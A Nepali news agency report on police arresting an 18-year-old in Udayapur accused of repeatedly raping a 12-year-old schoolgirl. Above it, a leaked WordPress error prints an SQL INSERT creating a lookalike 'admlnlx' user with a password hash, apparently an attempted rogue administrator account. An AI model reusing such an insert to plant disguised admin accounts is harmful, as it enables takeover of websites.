WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6.WXesQxloA8I634hHDL8EWxzlUvW0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 23:27:51', '', 'admlnlx', 'admlnlx')
गाईघाट(उदयपुर), माघ १६ –
वाह्र वर्षीय वालिकालाई पटक पटक करणी गरेको अभियोगमा प्रहरीले उदयपुर चिलाउने गाविस– ४ का १८ वर्षीय ताराबहादुर राउतलाई पक्राउ गरेको छ ।
स्थानीय एक विद्यालयको कक्षा– ४ मा अध्ययनरत् बालिकालाई बाटो छेकेर जङ्गलमा लगी करणी गर्ने गरेको खुलेपछि उनलाई शुक्रबार साँझ पक्राउ गरिएको प्रहरी चौकी सुकौराले जनाएको छ ।
विद्यालयबाट जङ्गलको बाटो भएर घर फर्कदै गर्दा गत माघ १० गते बेलुकी राउतले बालिकालाई पाखातिर लाँदै गरेको र बालिका चिच्याएको एक स्थानीयवासीले सुनेपछि उक्त घट्नाको तथ्य बाहिर आएको हो ।
बालिका डरले कामिरहेको र उक्त घट्नाबारे कसैलाई बताए राउतले पटक÷पटक ज्यान मार्ने धम्की दिदैं आएका कारण आफूले बाहिर अरुलाई भन्न नसकेको भएपनि विद्यालयकी शिक्षिका सीता तामाङलाई उक्त घटनाका सम्बन्धमा बालिकाले बताएकी प्रहरी चौकी सुकौराका प्रमुख राजकुमार खड्का बताउनुभयो ।
वालिकाको अभिभावक र विद्यालयकी शिक्षिकाको जाहेरीमा प्रहरीले राउतलाई पक्राउ गरेर अनुसन्धान सुरु गरेको जिल्ला प्रहरी कार्यालय उदयपुरका प्रहरी प्रमुख उपरीक्षक नरबहादुर केसीले बताउनुभयो । – रासस